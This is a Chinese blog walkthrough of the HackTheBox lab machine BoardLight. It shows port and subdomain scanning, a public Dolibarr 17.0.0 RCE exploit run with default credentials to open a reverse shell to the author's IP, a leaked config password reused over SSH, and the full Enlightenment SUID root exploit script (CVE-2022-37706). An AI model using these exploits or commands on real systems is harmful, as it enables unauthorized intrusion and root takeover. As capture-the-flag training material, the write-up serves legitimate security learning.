[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+Enlightenment v0.25.3权限提升

最新推荐文章于 2024-09-30 09:25:16 发布

Мартин.

最新推荐文章于 2024-09-30 09:25:16 发布

阅读量306

点赞数 6

分类专栏： HackTheBox 文章标签：安全

Whoami? Martin

本文链接：https://blog.csdn.net/qq_51886509/article/details/141570226

版权

HackTheBox 专栏收录该内容

114 篇文章 1 订阅

订阅专栏

信息收集

IP Address	Opening Ports
10.10.11.11	TCP:22,80

$ nmap -p- 10.10.11.11 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8221/tcp  filtered unknown
9564/tcp  filtered unknown
19285/tcp filtered unknown
19837/tcp filtered unknown
20734/tcp filtered unknown
24875/tcp filtered unknown
26918/tcp filtered unknown
36270/tcp filtered unknown
36538/tcp filtered unknown
38225/tcp filtered unknown
40483/tcp filtered unknown
53279/tcp filtered unknown
56489/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP && 子域名挖掘

$ whatweb 10.10.11.11

# sudo echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949

# sudo echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

http://crm.board.htb/

username:admin password:admin

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

$ python3 exp.py http://crm.board.htb admin admin 10.10.16.24 10032

www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php

username:dolibarrowner
password:serverfun2$2023!!

$ ssh larissa@10.10.11.11

User.txt

b7f82dc5b4ed058a7ea007f02cafde10

权限提升

larissa@boardlight:/tmp$ find / -perm -4000 -type f 2>/dev/null

https://www.exploit-db.com/exploits/51180

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net